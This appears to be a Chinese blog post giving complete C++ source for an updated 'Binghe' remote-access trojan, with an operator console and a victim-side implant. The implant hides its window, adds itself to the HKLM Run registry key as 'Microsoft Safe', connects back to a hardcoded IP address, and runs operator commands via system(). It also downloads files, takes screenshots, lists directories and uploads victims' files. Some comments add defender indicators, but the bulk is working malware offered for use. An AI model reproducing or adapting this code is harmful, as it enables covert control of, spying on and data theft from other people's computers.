C++ 冰河木马更新版本
2022-05-19
因为一些原因冰河木马我重新写了一次
先说更新后的功能:
这次可以修改注册表实现无限自启动
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
这次可以让对方电脑打开对方硬盘文件
远控端
/*server*/
#include <winsock2.h>
#include<iostream>
#include<string>
#include <fstream>
using namespace std;
#pragma comment(lib,"ws2_32.lib")//链接这个库
//TCP服务器端
void RecvFile(SOCKET sClient, string SaveFileName);
int connect();
/* Operator-console entry point (server side of this RAT).
   Keeps re-entering connect() while it returns 10, the value connect() uses
   for a socket/bind/listen failure. On success connect() never returns
   (its accept loop has no exit), so this effectively runs it once. */
int main()
{
int temp = 10;//10 is the "retry" sentinel connect() returns on setup failure
while (true)
{
if (temp == 10)
{
temp = connect();//re-enter the listener after a setup failure
}
else
{
//any other value: busy-spin here forever (no break, no sleep)
}
}
return 0;
}
/* Operator console listener (server side of this RAT).
   Opens TCP/80 on every local interface, then for each line typed at the
   "command:" prompt accepts ONE inbound connection from an implant, sends the
   typed line verbatim, and either receives a file (commands containing "pass")
   or prints the text reply. Returns 10 when socket/bind/listen setup fails
   (main() retries on that value); the accept loop below has no exit, so on
   success this never returns.
   Defender note: the channel is plaintext TCP with no authentication and no
   HTTP framing despite using port 80, so the literal command strings and
   replies are visible to any network inspection on the path. */
int connect()
{
//initialise Winsock
WORD sockVersion = MAKEWORD(2, 2);//requested Winsock version
WSADATA wsaData; // Winsock version actually returned
if (WSAStartup(sockVersion, &wsaData) != 0)
{
//startup failure is ignored here
}
//create the listening socket
SOCKET slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);//address family, type, protocol; AF_INET = IPv4
if (slisten == INVALID_SOCKET)//error handling
{
printf("scoket error!\n");
return 10;
}
//bind
sockaddr_in sin; //server endpoint address
sin.sin_family = AF_INET; //address family
sin.sin_port = htons(80); //port; htons converts host to network byte order (16-bit)
sin.sin_addr.S_un.S_addr = INADDR_ANY;//wildcard address: the server listens on all interfaces
if (bind(slisten, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)//LPSOCKADDR is just a pointer cast
{
printf("bind error !\n");
return 10;
}
//listen
if (listen(slisten, 5) == SOCKET_ERROR)//5 is the backlog (pending-connection queue size)
{
printf("listen error !\n");
return 10;
}
//TCP is a byte stream, so data is received in a loop
SOCKET sClient;//per-command connection
sockaddr_in remoteAddr;
int nAddrlen = sizeof(remoteAddr);
char revData[1024];//receive buffer
printf("waiting for connect...\n\n");
//one iteration == one operator command == one accepted connection
while (true)
{
printf("command:");
string data;
getline(cin, data);//read the command line from the keyboard
const char* sendData;
sendData = data.c_str(); //string to const char*
sClient = accept(slisten, (SOCKADDR *)&remoteAddr, &nAddrlen);//accept creates a new socket for this peer
if (sClient == INVALID_SOCKET)
{
printf("accept error !");
continue;//back to the prompt
}
printf("someone ip: %s\r\n", inet_ntoa(remoteAddr.sin_addr)); //inet_ntoa turns the address struct into a dotted string; \r is carriage return
//send the command
send(sClient, sendData, strlen(sendData), 0);
//receive the reply
//file transfer: a command containing "pass" makes the implant stream a file back
if (data.find("pass") != string::npos)//pass-D:\\001.txt-D:\\002.txt
{
string savepath = data.substr(data.find_last_of("-") + 1);//text after the last '-' is the local save path
RecvFile(sClient, savepath);
}
//text reply
else
{
int ret = recv(sClient, revData, 1024, 0);
printf("feedback:\n");
while (true)
{
if (ret > 0)
{
revData[ret] = 0x00;
printf(revData);
ret = recv(sClient, revData, 1024, 0);
}
break;//the loop body always reaches this break
}
printf("\n\n");
}
closesocket(sClient);
}
closesocket(slisten);
WSACleanup();
}
/* Receive a file streamed by the implant on sClient and write it to
   SaveFileName in binary mode. Reads until recv returns 0 (the sender closed
   the connection). Returns silently if the output file cannot be opened.
   This is the operator-side half of the "pass" file-exfiltration command. */
void RecvFile(SOCKET sClient, string SaveFileName)
{
cout << "receive start" << endl;
const int bufferSize = 1024;
char buffer[bufferSize] = { 0 };
int readLen = 0;
//string SaveFileName ; // path where the server saves the received file
ofstream desFile;
desFile.open(SaveFileName.c_str(), ios::binary);
if (!desFile)
{
return;
}
do
{
readLen = recv(sClient, buffer, bufferSize, 0);
if (readLen == 0)
{
break;//0 == orderly shutdown by the sender
}
else
{
desFile.write(buffer, readLen);
cout << "receiving" << endl;
}
} while (true);
cout << "receive over\n\n" << endl;
desFile.close();
}
病毒端
/*client*/
#include<iostream>
#include <io.h>
#include <sstream>
#include <afxwin.h>
#include <windows.h>
#include <fstream>
#include <winsock2.h>
using namespace std;
#pragma comment(lib,"ws2_32.lib")//windowssock库
#pragma comment(lib,"Urlmon.lib") //加入文件传输库
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // 这就是最重要的一个隐藏程序的代码
//TCP客户端
#define _CRT_SECURE_NO_WARNINGS
/*函数申明*/
int connect();
int set();
string deal(string things);
string GetProgramDir();
void download(string dourl, string a);
void SendFile(SOCKET sclient, string srcFileName);
string dir(string path);
void Screen(char filename[]);
LPWSTR ConvertCharToLPWSTR(const char* szString);
LPCWSTR stringToLPCWSTR(std::string orig);
TCHAR* CharToTCHAR(char* pChar);
/* Implant entry point (the "client"/victim side of this RAT).
   Installs the Run-key persistence first (set()), then loops calling
   connect(), which beacons to the hardcoded operator address. The linker
   pragma near the top of this file selects the windows subsystem, so no
   console window is shown while this runs. */
int main()
{
set();//persistence: HKLM Run value pointing at this executable
int temp = 10;
while (true)
{
if (temp = 10)//assignment, not comparison: always true, so connect() is re-entered on every return
{
temp = connect();//returns 10 on a Winsock/socket/connect failure; otherwise loops internally
}
else
{
break;//unreachable given the condition above
}
}
return 0;
}
/* Convert an ANSI C string to a newly allocated wide (TCHAR) string via
   MultiByteToWideChar(CP_ACP). The caller owns the new[]'d buffer. Nothing
   else in this listing calls this helper. */
TCHAR* CharToTCHAR(char* pChar)
{
TCHAR *pTchar = nullptr;
int nLen = strlen(pChar) + 1;//byte length including the terminator
pTchar = new wchar_t[nLen];
MultiByteToWideChar(CP_ACP, 0, pChar, nLen, pTchar, nLen);
return pTchar;
}
/* Convert an ANSI C string to a newly allocated wide string.
   nwLen is the wide length MultiByteToWideChar reports for the input; the
   conversion is then performed into a new[]'d WCHAR buffer. The caller owns
   the result; it is never freed anywhere in this listing. */
LPWSTR ConvertCharToLPWSTR(const char* szString)
{
int dwLen = strlen(szString) + 1;//byte length including the terminator
int nwLen = MultiByteToWideChar(CP_ACP, 0, szString, dwLen, NULL, 0);//query the required wide length
LPWSTR lpszPath = new WCHAR[dwLen];
MultiByteToWideChar(CP_ACP, 0, szString, dwLen, lpszPath, nwLen);
return lpszPath;
}
/* Convert a std::string to a malloc'd wide string with mbstowcs_s.
   The returned pointer is never freed by the callers in this listing
   (download() calls this twice per invocation). */
LPCWSTR stringToLPCWSTR(std::string orig)
{
size_t origsize = orig.length() + 1;//character count including the terminator
const size_t newsize = 100;
size_t convertedChars = 0;
wchar_t *wcstring = (wchar_t *)malloc(sizeof(wchar_t)*(orig.length() - 1));
mbstowcs_s(&convertedChars, wcstring, origsize, orig.c_str(), _TRUNCATE);
return wcstring;
}
/* Return the directory part of exeFullPath (the text before its last
   backslash). Intended to give the folder this executable lives in; only
   set() uses the result, and only for its length. */
string GetProgramDir()
{
char exeFullPath[MAX_PATH]; // Full path
LPWSTR exeFullPath1 = ConvertCharToLPWSTR(exeFullPath);//wide copy of the buffer
string strPath = "";
GetModuleFileName(NULL, exeFullPath1, MAX_PATH);
strPath = (string)exeFullPath; // Get full path of the file
int pos = strPath.find_last_of('\\', strPath.length());
return strPath.substr(0, pos); // Return the directory without the file name
}
/* Persistence: register this executable under
   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (64-bit view) as the
   REG_SZ value "Microsoft Safe", so Windows launches it at every logon.
   Opening HKLM with KEY_ALL_ACCESS requires an elevated process; on any
   failure it prints a message and then spins forever in while(1) instead of
   returning.
   Defender note: this key plus the value name "Microsoft Safe" are the static
   host indicators of this sample; registry value-set auditing on the Run keys
   (e.g. Sysmon event 13) surfaces the write at install time. */
int set()
{
LPCTSTR lpSubKey = L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
HKEY hKey;
REGSAM flag = KEY_WOW64_64KEY;//force the 64-bit registry view
DWORD dwDisposition = REG_OPENED_EXISTING_KEY;
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, 0, KEY_ALL_ACCESS | flag, &hKey);
//LONG lRet = ::RegCreateKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, NULL, NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
if (ERROR_SUCCESS != lRet)
{
printf("打开注册表失败,也许是权限不足");
while (1);//hang on "failed to open the registry key, maybe insufficient rights"
return 0;
}
string file = GetProgramDir();
TCHAR exeFullPath[MAX_PATH]; // Full path
GetModuleFileName(NULL, exeFullPath, MAX_PATH);//this executable's own path becomes the Run value
char *file1 = const_cast<char*>(file.c_str());
const char *pchrName1 = file.c_str();
lRet = ::RegSetValueEx(hKey, TEXT("Microsoft Safe"), NULL, REG_SZ, (LPBYTE)exeFullPath, strlen(pchrName1)*sizeof(TCHAR)+1); //write the registry value
if (ERROR_SUCCESS != lRet)
{
printf("写入注册表失败,也许是权限不足");
while (1);//hang on "failed to write the registry value, maybe insufficient rights"
return 0;
}
::RegCloseKey(hKey); //close the key handle
printf("成功");
}
/* Stream the file at srcFileName to sclient in 1024-byte chunks (binary),
   then print the number of bytes sent. This is the implant-side half of the
   "pass" command, i.e. the file-exfiltration path. Returns silently if the
   file cannot be opened. */
void SendFile(SOCKET sclient, string srcFileName)
{
int haveSend = 0;//running byte count
const int bufferSize = 1024;
char buffer[bufferSize] = { 0 };
int readLen = 0;
//string srcFileName ; // path of the file the implant sends
ifstream srcFile;
srcFile.open(srcFileName.c_str(), ios::binary);
if (!srcFile){
return;
}
while (!srcFile.eof()){
srcFile.read(buffer, bufferSize);
readLen = srcFile.gcount();//bytes actually read in this chunk
send(sclient, buffer, readLen, 0);
haveSend += readLen;
}
srcFile.close();
cout << "send: " << haveSend << "B" << endl;
}
/* Beacon loop (implant side). Each iteration opens a fresh TCP connection to
   the hardcoded operator address 175.24.174.70:80, receives one command,
   runs it through deal(), sends back either a file (replies containing
   "pass") or the text result, closes the socket and immediately reconnects.
   Returns 10 if Winsock init, socket() or connect() fails; otherwise never
   returns.
   Defender note: the address/port pair is the network indicator of this
   sample, and the reconnect loop has no delay, so an infected host produces a
   continuous stream of short plaintext connections to that address on TCP/80
   that are not HTTP. */
int connect()
{
WORD sockVersion = MAKEWORD(2, 2);
WSADATA data;
if (WSAStartup(sockVersion, &data) != 0)
{
printf("initialization failed!\n");
return 10;
}
//one iteration == one command round-trip on a new connection
while (true)
{
SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sclient == INVALID_SOCKET)
{
printf("invalid socket!\n");
return 10;
}
sockaddr_in serAddr; //endpoint address of the operator server
serAddr.sin_family = AF_INET;
serAddr.sin_port = htons(80);
serAddr.sin_addr.S_un.S_addr = inet_addr("175.24.174.70"); //dotted IP text to address
//the client does not bind a local endpoint; the system assigns one
if (connect(sclient, (sockaddr*)&serAddr, sizeof(serAddr)) == SOCKET_ERROR)
{
printf("connect error!\n");
closesocket(sclient);
return 10;
}
char recData[1024];
string a;
int ret = recv(sclient, recData, 1024, 0);//wait for one command from the operator
if (ret>0)
{
recData[ret] = 0x00;
cout << "command:" << recData << endl;
string CMD(recData);
a = deal(CMD);//execute and get the reply text
}
if (a.find("pass") != string::npos)
{
string sendfile = a.substr(a.find_last_of("-") + 1);//text after the last '-' is the local file to upload
SendFile(sclient, sendfile);
closesocket(sclient);
}
else
{
string data;
data = a;
const char* sendData;
sendData = data.c_str(); //string to const char*
cout << strlen(sendData) << endl;
send(sclient, sendData, strlen(sendData), 0);
closesocket(sclient);
}
}
WSACleanup();
}
/* Command dispatcher (implant side). The command text is matched by
   substring, first match wins, in this order: "dir", "down", "pass",
   "screen", "open". Arguments are the pieces between/after '-' separators,
   as in the example shown at each branch. Returns the text to send back to
   the operator.
   Defender note: "open" hands the operator-supplied string straight to
   system(), i.e. arbitrary command execution on the host; "down" downloads a
   URL to disk, "screen" takes a screenshot, "pass" uploads a file and "dir"
   lists a directory. A process tree of this executable spawning cmd.exe is
   the observable side effect of "open". */
string deal(string things)
{
//parse the command
if (things.find("dir") != string::npos)/* dir-D:\\ */
{
string result = things.substr(things.find_first_of("-") + 1);//path after the first '-'
string temp = dir(result);
cout << temp << endl;
return temp;
}
else if (things.find("down") != string::npos)//down-http://www.anyeur.club-D:index.php
{
string downurl = things.substr(things.find_first_of("-") + 1, things.find_last_of("-") - things.find_first_of("-") - 1);//between first and last '-'
string savepath = things.substr(things.find_last_of("-") + 1);//after the last '-'
download(downurl, savepath);
return "download over!";
}
else if (things.find("pass") != string::npos)//pass-D:\\001.txt-D:\\002.txt
{
string sendfile = things.substr(things.find_first_of("-") + 1, things.find_last_of("-") - things.find_first_of("-") - 1);//source path between first and last '-'
return "pass-" + sendfile;//connect() uploads the file named in this reply
}
else if (things.find("screen") != string::npos)//screen-D:\\001.jpg
{
string savepat = things.substr(things.find_last_of("-") + 1);
char savepath[20];
strcpy(savepath, savepat.c_str());
Screen(savepath);
return "screen over!";
}
else if (things.find("open") != string::npos)//open-D:\\001.jpg
{
string openfile = things.substr(things.find_last_of("-") + 1);
const char * filename = openfile.c_str();
system(filename);//operator-controlled string run through the shell
return "open over!";
}
else
{
return "nothing";
}
}
/* Download dourl to disk with URLDownloadToFile and print the outcome.
   The destination path is produced by wsprintf(path, savepath, path): the
   operator-supplied save path is used as the format string and the current
   directory as its argument. Both wide strings come from stringToLPCWSTR and
   are not freed here. */
void download(string dourl, string a)
{
LPCWSTR url = stringToLPCWSTR(dourl);
printf("downurl: %S\n", url);
TCHAR path[MAX_PATH];
GetCurrentDirectory(MAX_PATH, path);//current directory is the format argument below
LPCWSTR savepath = stringToLPCWSTR(a);
wsprintf(path, savepath, path);//savepath acts as the format string
printf("savepath: %S\n", path);
HRESULT res = URLDownloadToFile(NULL, url, path, 0, NULL);
if (res == S_OK)
{
printf("downover\n");
}
else if (res == E_OUTOFMEMORY)
{
printf("recvlength has something wrong or dont set recvlength\n");
}
else if (res == INET_E_DOWNLOAD_FAILURE)
{
printf("url has something wrong\n");
}
else
{
printf("unkonwn error\n", res);
}
}
/* List the entries of `path` (pattern path\*) with _findfirst/_findnext and
   return their names concatenated, each preceded by a newline. */
string dir(string path)
{
string result;
long hFile = 0;
struct _finddata_t fileInfo;
string pathName, exdName;
// \\* matches every entry type; \\*.jpg would restrict the walk to jpg files
if ((hFile = _findfirst(pathName.assign(path).append("\\*").c_str(), &fileInfo)) == -1)
{
}
do
{
result = result + "\n" + fileInfo.name;
} while (_findnext(hFile, &fileInfo) == 0);
_findclose(hFile);
return result;
}
/* Screenshot: copy the whole screen into a memory DC with BitBlt and write it
   to `filename` as an uncompressed .bmp (file header, info header, then the
   raw DIB rows from GetDIBits). Uses MFC CDC/CBitmap. The resulting file on
   disk, at an operator-chosen path, is the observable artefact. */
void Screen(char filename[])
{
CDC *pDC;//screen DC
pDC = CDC::FromHandle(GetDC(NULL));//DC for the entire current screen
int BitPerPixel = pDC->GetDeviceCaps(BITSPIXEL);//colour depth
int Width = pDC->GetDeviceCaps(HORZRES);
int Height = pDC->GetDeviceCaps(VERTRES);
printf("当前屏幕色彩模式为%d位色彩\n", BitPerPixel);
printf("屏幕宽度:%d\n", Width);
printf("屏幕高度:%d\n", Height);
CDC memDC;//memory DC
memDC.CreateCompatibleDC(pDC);
CBitmap memBitmap, *oldmemBitmap;//bitmap compatible with the screen
memBitmap.CreateCompatibleBitmap(pDC, Width, Height);
oldmemBitmap = memDC.SelectObject(&memBitmap);//select memBitmap into the memory DC
memDC.BitBlt(0, 0, Width, Height, pDC, 0, 0, SRCCOPY);//copy the screen image into the memory DC
//the code below saves the bitmap in memDC to a file
BITMAP bmp;
memBitmap.GetBitmap(&bmp);//bitmap properties
FILE *fp = fopen(filename, "w+b");
BITMAPINFOHEADER bih = { 0 };//bitmap info header
bih.biBitCount = bmp.bmBitsPixel;//bits per pixel
bih.biCompression = BI_RGB;
bih.biHeight = bmp.bmHeight;//height
bih.biPlanes = 1;
bih.biSize = sizeof(BITMAPINFOHEADER);
bih.biSizeImage = bmp.bmWidthBytes * bmp.bmHeight;//pixel data size
bih.biWidth = bmp.bmWidth;//width
BITMAPFILEHEADER bfh = { 0 };//bitmap file header
bfh.bfOffBits = sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER);//offset to the pixel data
bfh.bfSize = bfh.bfOffBits + bmp.bmWidthBytes * bmp.bmHeight;//total file size
bfh.bfType = (WORD)0x4d42;//"BM" magic
fwrite(&bfh, 1, sizeof(BITMAPFILEHEADER), fp);//write the file header
fwrite(&bih, 1, sizeof(BITMAPINFOHEADER), fp);//write the info header
byte * p = new byte[bmp.bmWidthBytes * bmp.bmHeight];//buffer for the pixel data
GetDIBits(memDC.m_hDC, (HBITMAP)memBitmap.m_hObject, 0, Height, p,
(LPBITMAPINFO)&bih, DIB_RGB_COLORS);//fetch the pixel data
fwrite(p, 1, bmp.bmWidthBytes * bmp.bmHeight, fp);//write the pixel data
delete[] p;
fclose(fp);
memDC.SelectObject(oldmemBitmap);
}